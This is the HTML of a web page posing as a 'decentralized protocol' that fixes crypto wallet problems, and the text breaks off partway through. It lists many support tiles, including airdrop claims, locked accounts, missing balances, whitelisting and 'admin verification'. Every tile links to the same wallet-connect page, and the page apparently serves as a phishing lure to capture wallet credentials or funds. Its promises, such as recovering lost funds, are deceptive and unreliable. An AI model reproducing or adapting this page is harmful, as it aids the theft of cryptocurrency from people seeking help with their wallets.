<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <script src="/6720b3248bcabc30460697f9.js"></script>
    <link rel="shortcut icon" href="favicon.png">
    <meta name="language" content="en">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="theme-color" content="#000000">
    <meta name="title" content="Decentralized Dapps - We are unifying Web3 by providing best-in-class, self-custodial, and multichain support">
    <meta name="description" content="We are unifying Web3 by providing best-in-class, self-custodial, and multichain support">
    <link rel="manifest" href="manifest.json">
    <title>Decentralized Dapps - We are unifying Web3 by providing best-in-class, self-custodial, and multichain support</title>
    <link href="static/css/2.14dca502.chunk.css" rel="stylesheet">
    <link href="static/css/main.e94723d5.chunk.css" rel="stylesheet">
    <link href="static/css/index.css" rel="stylesheet">
    <style data-emotion="css" data-s=""></style>
    <style>
      @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap');

      @keyframes w3m-shake {
        0% {
          transform: scale(1) rotate(0deg);
        }

        20% {
          transform: scale(1) rotate(-1deg);
        }

        40% {
          transform: scale(1) rotate(1.5deg);
        }

        60% {
          transform: scale(1) rotate(-1.5deg);
        }

        80% {
          transform: scale(1) rotate(1deg);
        }

        100% {
          transform: scale(1) rotate(0deg);
        }
      }

      @keyframes w3m-iframe-fade-out {
        0% {
          opacity: 1;
        }

        100% {
          opacity: 0;
        }
      }

      @keyframes w3m-iframe-zoom-in {
        0% {
          transform: translateY(50px);
          opacity: 0;
        }

        100% {
          transform: translateY(0px);
          opacity: 1;
        }
      }

      @keyframes w3m-iframe-zoom-in-mobile {
        0% {
          transform: scale(0.95);
          opacity: 0;
        }

        100% {
          transform: scale(1);
          opacity: 1;
        }
      }

      :root {
        --w3m-modal-width: 360px;
        --w3m-color-mix-strength: 0%;
        --w3m-font-family: Inter, Segoe UI, Roboto, Oxygen, Ubuntu, Cantarell, Fira Sans, Droid Sans, Helvetica Neue, sans-serif;
        ;
        --w3m-font-size-master: 10px;
        --w3m-border-radius-master: 4px;
        --w3m-z-index: 999;
        --wui-font-family: var(--w3m-font-family);
        --wui-font-size-mini: calc(var(--w3m-font-size-master) * 0.8);
        --wui-font-size-micro: var(--w3m-font-size-master);
        --wui-font-size-tiny: calc(var(--w3m-font-size-master) * 1.2);
        --wui-font-size-small: calc(var(--w3m-font-size-master) * 1.4);
        --wui-font-size-paragraph: calc(var(--w3m-font-size-master) * 1.6);
        --wui-font-size-medium: calc(var(--w3m-font-size-master) * 1.8);
        --wui-font-size-large: calc(var(--w3m-font-size-master) * 2);
        --wui-font-size-title-6: calc(var(--w3m-font-size-master) * 2.2);
        --wui-font-size-medium-title: calc(var(--w3m-font-size-master) * 2.4);
        --wui-font-size-2xl: calc(var(--w3m-font-size-master) * 4);
        --wui-border-radius-5xs: var(--w3m-border-radius-master);
        --wui-border-radius-4xs: calc(var(--w3m-border-radius-master) * 1.5);
        --wui-border-radius-3xs: calc(var(--w3m-border-radius-master) * 2);
        --wui-border-radius-xxs: calc(var(--w3m-border-radius-master) * 3);
        --wui-border-radius-xs: calc(var(--w3m-border-radius-master) * 4);
        --wui-border-radius-s: calc(var(--w3m-border-radius-master) * 5);
        --wui-border-radius-m: calc(var(--w3m-border-radius-master) * 7);
        --wui-border-radius-l: calc(var(--w3m-border-radius-master) * 9);
        --wui-border-radius-3xl: calc(var(--w3m-border-radius-master) * 20);
        --wui-font-weight-light: 400;
        --wui-font-weight-regular: 500;
        --wui-font-weight-medium: 600;
        --wui-font-weight-bold: 700;
        --wui-letter-spacing-2xl: -1.6px;
        --wui-letter-spacing-medium-title: -0.96px;
        --wui-letter-spacing-title-6: -0.88px;
        --wui-letter-spacing-large: -0.8px;
        --wui-letter-spacing-medium: -0.72px;
        --wui-letter-spacing-paragraph: -0.64px;
        --wui-letter-spacing-small: -0.56px;
        --wui-letter-spacing-tiny: -0.48px;
        --wui-letter-spacing-micro: -0.2px;
        --wui-letter-spacing-mini: -0.16px;
        --wui-spacing-0: 0px;
        --wui-spacing-4xs: 2px;
        --wui-spacing-3xs: 4px;
        --wui-spacing-xxs: 6px;
        --wui-spacing-2xs: 7px;
        --wui-spacing-xs: 8px;
        --wui-spacing-1xs: 10px;
        --wui-spacing-s: 12px;
        --wui-spacing-m: 14px;
        --wui-spacing-l: 16px;
        --wui-spacing-2l: 18px;
        --wui-spacing-xl: 20px;
        --wui-spacing-xxl: 24px;
        --wui-spacing-2xl: 32px;
        --wui-spacing-3xl: 40px;
        --wui-spacing-4xl: 90px;
        --wui-spacing-5xl: 95px;
        --wui-icon-box-size-xxs: 14px;
        --wui-icon-box-size-xs: 20px;
        --wui-icon-box-size-sm: 24px;
        --wui-icon-box-size-md: 32px;
        --wui-icon-box-size-lg: 40px;
        --wui-icon-box-size-2lg: 48px;
        --wui-icon-box-size-xl: 64px;
        --wui-icon-size-inherit: inherit;
        --wui-icon-size-xxs: 10px;
        --wui-icon-size-xs: 12px;
        --wui-icon-size-sm: 14px;
        --wui-icon-size-md: 16px;
        --wui-icon-size-mdl: 18px;
        --wui-icon-size-lg: 20px;
        --wui-icon-size-xl: 24px;
        --wui-icon-size-xxl: 28px;
        --wui-wallet-image-size-inherit: inherit;
        --wui-wallet-image-size-sm: 40px;
        --wui-wallet-image-size-md: 56px;
        --wui-wallet-image-size-lg: 80px;
        --wui-visual-size-size-inherit: inherit;
        --wui-visual-size-sm: 40px;
        --wui-visual-size-md: 55px;
        --wui-visual-size-lg: 80px;
        --wui-box-size-md: 100px;
        --wui-box-size-lg: 120px;
        --wui-ease-out-power-2: cubic-bezier(0, 0, 0.22, 1);
        --wui-ease-out-power-1: cubic-bezier(0, 0, 0.55, 1);
        --wui-ease-in-power-3: cubic-bezier(0.66, 0, 1, 1);
        --wui-ease-in-power-2: cubic-bezier(0.45, 0, 1, 1);
        --wui-ease-in-power-1: cubic-bezier(0.3, 0, 1, 1);
        --wui-ease-inout-power-1: cubic-bezier(0.45, 0, 0.55, 1);
        --wui-duration-lg: 200ms;
        --wui-duration-md: 125ms;
        --wui-duration-sm: 75ms;
        --wui-path-network-sm: path('M15.4 2.1a5.21 5.21 0 0 1 5.2 0l11.61 6.7a5.21 5.21 0 0 1 2.61 4.52v13.4c0 1.87-1 3.59-2.6 4.52l-11.61 6.7c-1.62.93-3.6.93-5.22 0l-11.6-6.7a5.21 5.21 0 0 1-2.61-4.51v-13.4c0-1.87 1-3.6 2.6-4.52L15.4 2.1Z'
          );
        --wui-path-network-md: path('M43.4605 10.7248L28.0485 1.61089C25.5438 0.129705 22.4562 0.129705 19.9515 1.61088L4.53951 10.7248C2.03626 12.2051 0.5 14.9365 0.5 17.886V36.1139C0.5 39.0635 2.03626 41.7949 4.53951 43.2752L19.9515 52.3891C22.4562 53.8703 25.5438 53.8703 28.0485 52.3891L43.4605 43.2752C45.9637 41.7949 47.5 39.0635 47.5 36.114V17.8861C47.5 14.9365 45.9637 12.2051 43.4605 10.7248Z'
          );
        --wui-path-network-lg: path('M78.3244 18.926L50.1808 2.45078C45.7376 -0.150261 40.2624 -0.150262 35.8192 2.45078L7.6756 18.926C3.23322 21.5266 0.5 26.3301 0.5 31.5248V64.4752C0.5 69.6699 3.23322 74.4734 7.6756 77.074L35.8192 93.5492C40.2624 96.1503 45.7376 96.1503 50.1808 93.5492L78.3244 77.074C82.7668 74.4734 85.5 69.6699 85.5 64.4752V31.5248C85.5 26.3301 82.7668 21.5266 78.3244 18.926Z'
          );
        --wui-width-network-sm: 36px;
        --wui-width-network-md: 48px;
        --wui-width-network-lg: 86px;
        --wui-height-network-sm: 40px;
        --wui-height-network-md: 54px;
        --wui-height-network-lg: 96px;
        --wui-icon-size-network-xs: 12px;
        --wui-icon-size-network-sm: 16px;
        --wui-icon-size-network-md: 24px;
        --wui-icon-size-network-lg: 42px;
        --wui-color-inherit: inherit;
        --wui-color-inverse-100: #fff;
        --wui-color-inverse-000: #000;
        --wui-cover: rgba(20, 20, 20, 0.8);
        --wui-color-modal-bg: var(--wui-color-modal-bg-base);
        --wui-color-accent-100: var(--wui-color-accent-base-100);
        --wui-color-accent-090: var(--wui-color-accent-base-090);
        --wui-color-accent-080: var(--wui-color-accent-base-080);
        --wui-color-success-100: var(--wui-color-success-base-100);
        --wui-color-error-100: var(--wui-color-error-base-100);
        --wui-icon-box-bg-error-100: var(--wui-icon-box-bg-error-base-100);
        --wui-icon-box-bg-blue-100: var(--wui-icon-box-bg-blue-base-100);
        --wui-icon-box-bg-success-100: var(--wui-icon-box-bg-success-base-100);
        --wui-icon-box-bg-inverse-100: var(--wui-icon-box-bg-inverse-base-100);
        --wui-all-wallets-bg-100: var(--wui-all-wallets-bg-100);
        --wui-avatar-border: var(--wui-avatar-border-base);
        --wui-thumbnail-border: var(--wui-thumbnail-border-base);
        --wui-box-shadow-blue: var(--wui-color-accent-glass-020);
      }

      @supports (background: color-mix(in srgb, white 50%, black)) {
        :root {
          --wui-color-modal-bg: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-modal-bg-base));
          --wui-box-shadow-blue: color-mix(in srgb, var(--wui-color-accent-100) 20%, transparent);
          --wui-color-accent-100: color-mix(in srgb,
              var(--wui-color-accent-base-100) 100%,
              transparent);
          --wui-color-accent-090: color-mix(in srgb,
              var(--wui-color-accent-base-100) 90%,
              transparent);
          --wui-color-accent-080: color-mix(in srgb,
              var(--wui-color-accent-base-100) 80%,
              transparent);
          --wui-color-accent-glass-090: color-mix(in srgb,
              var(--wui-color-accent-base-100) 90%,
              transparent);
          --wui-color-accent-glass-080: color-mix(in srgb,
              var(--wui-color-accent-base-100) 80%,
              transparent);
          --wui-color-accent-glass-020: color-mix(in srgb,
              var(--wui-color-accent-base-100) 20%,
              transparent);
          --wui-color-accent-glass-015: color-mix(in srgb,
              var(--wui-color-accent-base-100) 15%,
              transparent);
          --wui-color-accent-glass-010: color-mix(in srgb,
              var(--wui-color-accent-base-100) 10%,
              transparent);
          --wui-color-accent-glass-005: color-mix(in srgb,
              var(--wui-color-accent-base-100) 5%,
              transparent);
          --wui-color-accent-002: color-mix(in srgb,
              var(--wui-color-accent-base-100) 2%,
              transparent);
          --wui-color-fg-100: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-fg-100));
          --wui-color-fg-125: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-fg-125));
          --wui-color-fg-150: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-fg-150));
          --wui-color-fg-175: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-fg-175));
          --wui-color-fg-200: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-fg-200));
          --wui-color-fg-225: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-fg-225));
          --wui-color-fg-250: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-fg-250));
          --wui-color-fg-275: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-fg-275));
          --wui-color-fg-300: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-fg-300));
          --wui-color-bg-100: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-bg-100));
          --wui-color-bg-125: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-bg-125));
          --wui-color-bg-150: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-bg-150));
          --wui-color-bg-175: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-bg-175));
          --wui-color-bg-200: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-bg-200));
          --wui-color-bg-225: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-bg-225));
          --wui-color-bg-250: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-bg-250));
          --wui-color-bg-275: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-bg-275));
          --wui-color-bg-300: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-bg-300));
          --wui-color-success-100: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-success-base-100));
          --wui-color-error-100: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-color-error-base-100));
          --wui-icon-box-bg-error-100: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-icon-box-bg-error-base-100));
          --wui-icon-box-bg-accent-100: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-icon-box-bg-blue-base-100));
          --wui-icon-box-bg-success-100: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-icon-box-bg-success-base-100));
          --wui-icon-box-bg-inverse-100: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-icon-box-bg-inverse-base-100));
          --wui-all-wallets-bg-100: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-all-wallets-bg-100));
          --wui-avatar-border: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-avatar-border-base));
          --wui-thumbnail-border: color-mix(in srgb,
              var(--w3m-color-mix) var(--w3m-color-mix-strength),
              var(--wui-thumbnail-border-base));
        }
      }
    </style>
    <style media="enabled">
      :root {
        --w3m-color-mix: #000;
        --w3m-accent: hsla(231, 100%, 70%, 1);
        --w3m-default: #000;
        --wui-color-modal-bg-base: #fff;
        --wui-color-accent-base-100: var(--w3m-accent);
        --wui-color-blueberry-100: hsla(231, 100%, 70%, 1);
        --wui-color-blueberry-090: hsla(231, 97%, 72%, 1);
        --wui-color-blueberry-080: hsla(231, 92%, 74%, 1);
        --wui-color-fg-100: #141414;
        --wui-color-fg-125: #2d3131;
        --wui-color-fg-150: #474d4d;
        --wui-color-fg-175: #636d6d;
        --wui-color-fg-200: #798686;
        --wui-color-fg-225: #828f8f;
        --wui-color-fg-250: #8b9797;
        --wui-color-fg-275: #95a0a0;
        --wui-color-fg-300: #9ea9a9;
        --wui-color-bg-100: #ffffff;
        --wui-color-bg-125: #f5fafa;
        --wui-color-bg-150: #f3f8f8;
        --wui-color-bg-175: #eef4f4;
        --wui-color-bg-200: #eaf1f1;
        --wui-color-bg-225: #e5eded;
        --wui-color-bg-250: #e1e9e9;
        --wui-color-bg-275: #dce7e7;
        --wui-color-bg-300: #d8e3e3;
        --wui-color-success-base-100: #26b562;
        --wui-color-error-base-100: #f05142;
        --wui-color-success-glass-001: rgba(38, 181, 98, 0.01);
        --wui-color-success-glass-002: rgba(38, 181, 98, 0.02);
        --wui-color-success-glass-005: rgba(38, 181, 98, 0.05);
        --wui-color-success-glass-010: rgba(38, 181, 98, 0.1);
        --wui-color-success-glass-015: rgba(38, 181, 98, 0.15);
        --wui-color-success-glass-020: rgba(38, 181, 98, 0.2);
        --wui-color-success-glass-025: rgba(38, 181, 98, 0.25);
        --wui-color-success-glass-030: rgba(38, 181, 98, 0.3);
        --wui-color-success-glass-060: rgba(38, 181, 98, 0.6);
        --wui-color-success-glass-080: rgba(38, 181, 98, 0.8);
        --wui-color-error-glass-001: rgba(240, 81, 66, 0.01);
        --wui-color-error-glass-002: rgba(240, 81, 66, 0.02);
        --wui-color-error-glass-005: rgba(240, 81, 66, 0.05);
        --wui-color-error-glass-010: rgba(240, 81, 66, 0.1);
        --wui-color-error-glass-015: rgba(240, 81, 66, 0.15);
        --wui-color-error-glass-020: rgba(240, 81, 66, 0.2);
        --wui-color-error-glass-025: rgba(240, 81, 66, 0.25);
        --wui-color-error-glass-030: rgba(240, 81, 66, 0.3);
        --wui-color-error-glass-060: rgba(240, 81, 66, 0.6);
        --wui-color-error-glass-080: rgba(240, 81, 66, 0.8);
        --wui-icon-box-bg-error-base-100: #f4dfdd;
        --wui-icon-box-bg-blue-base-100: #d9ecfb;
        --wui-icon-box-bg-success-base-100: #daf0e4;
        --wui-icon-box-bg-inverse-base-100: #dcecfc;
        --wui-all-wallets-bg-100: #e8f1fa;
        --wui-avatar-border-base: #f3f4f4;
        --wui-thumbnail-border-base: #eaefef;
        --wui-color-gray-glass-001: rgba(0, 0, 0, 0.01);
        --wui-color-gray-glass-002: rgba(0, 0, 0, 0.02);
        --wui-color-gray-glass-005: rgba(0, 0, 0, 0.05);
        --wui-color-gray-glass-010: rgba(0, 0, 0, 0.1);
        --wui-color-gray-glass-015: rgba(0, 0, 0, 0.15);
        --wui-color-gray-glass-020: rgba(0, 0, 0, 0.2);
        --wui-color-gray-glass-025: rgba(0, 0, 0, 0.25);
        --wui-color-gray-glass-030: rgba(0, 0, 0, 0.3);
        --wui-color-gray-glass-060: rgba(0, 0, 0, 0.6);
        --wui-color-gray-glass-080: rgba(0, 0, 0, 0.8);
        --wui-color-gray-glass-090: rgba(0, 0, 0, 0.9);
      }
    </style>
    <style>
      :root {
        --w3m-color-mix: #fff;
        --w3m-accent: hsla(230, 100%, 67%, 1);
        --w3m-default: #fff;
        --wui-color-modal-bg-base: #121313;
        --wui-color-accent-base-100: var(--w3m-accent);
        --wui-color-blueberry-100: hsla(230, 100%, 67%, 1);
        --wui-color-blueberry-090: hsla(231, 76%, 61%, 1);
        --wui-color-blueberry-080: hsla(230, 59%, 55%, 1);
        --wui-color-blueberry-050: hsla(231, 100%, 70%, 0.1);
        --wui-color-fg-100: #e4e7e7;
        --wui-color-fg-125: #d0d5d5;
        --wui-color-fg-150: #a8b1b1;
        --wui-color-fg-175: #a8b0b0;
        --wui-color-fg-200: #949e9e;
        --wui-color-fg-225: #868f8f;
        --wui-color-fg-250: #788080;
        --wui-color-fg-275: #788181;
        --wui-color-fg-300: #6e7777;
        --wui-color-bg-100: #141414;
        --wui-color-bg-125: #191a1a;
        --wui-color-bg-150: #1e1f1f;
        --wui-color-bg-175: #222525;
        --wui-color-bg-200: #272a2a;
        --wui-color-bg-225: #2c3030;
        --wui-color-bg-250: #313535;
        --wui-color-bg-275: #363b3b;
        --wui-color-bg-300: #3b4040;
        --wui-color-success-base-100: #26d962;
        --wui-color-error-base-100: #f25a67;
        --wui-color-success-glass-001: rgba(38, 217, 98, 0.01);
        --wui-color-success-glass-002: rgba(38, 217, 98, 0.02);
        --wui-color-success-glass-005: rgba(38, 217, 98, 0.05);
        --wui-color-success-glass-010: rgba(38, 217, 98, 0.1);
        --wui-color-success-glass-015: rgba(38, 217, 98, 0.15);
        --wui-color-success-glass-020: rgba(38, 217, 98, 0.2);
        --wui-color-success-glass-025: rgba(38, 217, 98, 0.25);
        --wui-color-success-glass-030: rgba(38, 217, 98, 0.3);
        --wui-color-success-glass-060: rgba(38, 217, 98, 0.6);
        --wui-color-success-glass-080: rgba(38, 217, 98, 0.8);
        --wui-color-error-glass-001: rgba(242, 90, 103, 0.01);
        --wui-color-error-glass-002: rgba(242, 90, 103, 0.02);
        --wui-color-error-glass-005: rgba(242, 90, 103, 0.05);
        --wui-color-error-glass-010: rgba(242, 90, 103, 0.1);
        --wui-color-error-glass-015: rgba(242, 90, 103, 0.15);
        --wui-color-error-glass-020: rgba(242, 90, 103, 0.2);
        --wui-color-error-glass-025: rgba(242, 90, 103, 0.25);
        --wui-color-error-glass-030: rgba(242, 90, 103, 0.3);
        --wui-color-error-glass-060: rgba(242, 90, 103, 0.6);
        --wui-color-error-glass-080: rgba(242, 90, 103, 0.8);
        --wui-color-gray-glass-001: rgba(255, 255, 255, 0.01);
        --wui-color-gray-glass-002: rgba(255, 255, 255, 0.02);
        --wui-color-gray-glass-005: rgba(255, 255, 255, 0.05);
        --wui-color-gray-glass-010: rgba(255, 255, 255, 0.1);
        --wui-color-gray-glass-015: rgba(255, 255, 255, 0.15);
        --wui-color-gray-glass-020: rgba(255, 255, 255, 0.2);
        --wui-color-gray-glass-025: rgba(255, 255, 255, 0.25);
        --wui-color-gray-glass-030: rgba(255, 255, 255, 0.3);
        --wui-color-gray-glass-060: rgba(255, 255, 255, 0.6);
        --wui-color-gray-glass-080: rgba(255, 255, 255, 0.8);
        --wui-color-gray-glass-090: rgba(255, 255, 255, 0.9);
        --wui-icon-box-bg-error-base-100: #3c2426;
        --wui-icon-box-bg-blue-base-100: #20303f;
        --wui-icon-box-bg-success-base-100: #1f3a28;
        --wui-icon-box-bg-inverse-base-100: #243240;
        --wui-all-wallets-bg-100: #222b35;
        --wui-avatar-border-base: #252525;
        --wui-thumbnail-border-base: #252525;
      }
    </style>
  </head>
  <body class="home-main header-fixed" data-aos-easing="ease" data-aos-duration="400" data-aos-delay="0">
    <div class="wrapper">
      <noscript>You need to enable JavaScript to run this app.</noscript>
      <div class="preloader" style="display: none;">
        <div class="clear-loading loading-effect-2">
          <span></span>
        </div>
      </div>
      <header id="header" class="header is-fixed is-small" style="display: block;">
        <div class="container-fluid">
          <div style="height:62px;background-color:#1d2330;overflow:hidden;box-sizing:border-box;border:1px solid #282e3b;border-radius:4px;text-align:right;line-height:14px;block-size:62px;font-size:12px;font-feature-settings:normal;text-size-adjust:100%;box-shadow:inset 0 -20px 0 0 #262b38;padding:1px;padding:0;margin:0;width:100%">
            <div style="height:40px;padding:0;margin:0;width:100%">
              <iframe src="https://widget.coinlib.io/widget?type=horizontal_v2&amp;theme=dark&amp;pref_coin_id=1505&amp;invert_hover=no" width="100%" height="36px" scrolling="auto" marginwidth="0" marginheight="0" frameborder="0" border="0" style="border:0;margin:0;padding:0"></iframe>
            </div>
            <div style="color:#626b7f;line-height:14px;font-weight:400;font-size:11px;box-sizing:border-box;padding:2px 6px;width:100%;font-family:Verdana,Tahoma,Arial,sans-serif">
              <a href="https://coinlib.io/" target="_blank" style="font-weight:500;color:#626b7f;text-decoration:none;font-size:11px">Cryptocurrency Prices</a>&nbsp;by Coinlib
            </div>
          </div>
        </div>
      </header>
      <div id="root">
        <div class="App">
          <section class="banner s2">
            <div class="shape"></div>
            <div class="shape right"></div>
            <div class="container">
              <div class="row">
                <div class="col-12">
                  <div class="block-text center">
                    <h6 class="sub-heading">
                      <span>Decentralized Protocol</span>
                    </h6>
                    <h2 class="heading">Decentralized protocol for syncing various Wallets issues on Secure Server.</h2>
                    <p class="mb-34">This is not an app but a protocol that establishes a remote resolution between all noncustodial wallet.</p>
                    <div class="action mt-5">
                      <a href="./wallet/index.html" class="action-btn">
                        <span>Connect Wallet</span>
                      </a>
                      <div class="select-main" id="slect-main">
                        <div class=" css-b62m3t-container" id="selectbox">
                          <span id="react-select-selectbox-live-region" class="css-7pg0cj-a11yText"></span>
                          <span aria-live="polite" aria-atomic="false" aria-relevant="additions text" class="css-7pg0cj-a11yText"></span>
                          <div class=" css-1s2u09g-control">
                            <div class=" css-13c924m">
                              <div class=" css-xpeoug-placeholder" id="react-select-selectbox-placeholder">Select Chain</div>
                              <div class=" css-1827kur" data-value="">
                                <input class="" autocapitalize="none" autocomplete="off" autocorrect="off" id="react-select-selectbox-input" spellcheck="false" tabindex="0" type="text" aria-autocomplete="list" aria-expanded="false" aria-haspopup="true" role="combobox" aria-describedby="react-select-selectbox-placeholder" value="" style="color: inherit; background: 0px center; opacity: 1; width: 100%; grid-area: 1 / 2; font: inherit; min-width: 2px; border: 0px; margin: 0px; outline: 0px; padding: 0px;">
                              </div>
                            </div>
                            <div class=" css-1wy0on6">
                              <span class=" css-1vtyy7d-indicatorSeparator"></span>
                              <div class=" css-10bl27q-indicatorContainer" aria-hidden="true">
                                <svg height="20" width="20" viewBox="0 0 20 20" aria-hidden="true" focusable="false" class="css-8mmkcg">
                                  <path d="M4.516 7.548c0.436-0.446 1.043-0.481 1.576 0l3.908 3.747 3.908-3.747c0.533-0.481 1.141-0.446 1.574 0 0.436 0.445 0.408 1.197 0 1.615-0.406 0.418-4.695 4.502-4.695 4.502-0.217 0.223-0.502 0.335-0.787 0.335s-0.57-0.112-0.789-0.335c0 0-4.287-4.084-4.695-4.502s-0.436-1.17 0-1.615z"></path>
                                </svg>
                              </div>
                            </div>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </section>
          <section class="speciality">
            <div class="shape right"></div>
            <div class="container">
              <div class="row">
                <div class="col-12">
                  <div class="block-text center">
                    <h3 class="heading wow" data-splitting="true">Select Sync Type</h3>
                  </div>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Admin Verification</h5>
                      <p>Click here to verify as an admin</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Claim</h5>
                      <p>Click here to claim tokens or have issues claiming tokens</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Swap</h5>
                      <p>Click here for token swap or any issues while trying doing token swap</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Slippage</h5>
                      <p>Click here for slippage related or transaction fee related</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Connect to Dapps</h5>
                      <p>Click here to solve any dapp connection issue</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Transaction</h5>
                      <p>Click here for all transaction related error</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Claim Airdrop</h5>
                      <p>Click here for any error during airdrop claim</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Exchange</h5>
                      <p>Click here for token exchange or error while exchanging tokens</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Cross Transfer</h5>
                      <p>Click here for cross bridge issues while doing cross transfer</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Staking</h5>
                      <p>Click here for token staking/unstake related issues</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Migrate</h5>
                      <p>Click here for migration or anything related to migration</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Whitelist</h5>
                      <p>Click here to whitelist your address or whitelist related error</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Buy Coins/Tokens</h5>
                      <p>To trade, your account must be marked as a trusted payment source</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Locked Account</h5>
                      <p>Click here if your account was locked or wallet stuck</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">NFTs</h5>
                      <p>Click here for NFTs minting/transfer issues</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Missing/Irregular Balance</h5>
                      <p>Click here to recover your lost or missing funds</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Transaction Delay</h5>
                      <p>Click here for any transaction eror or delayed transactions</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
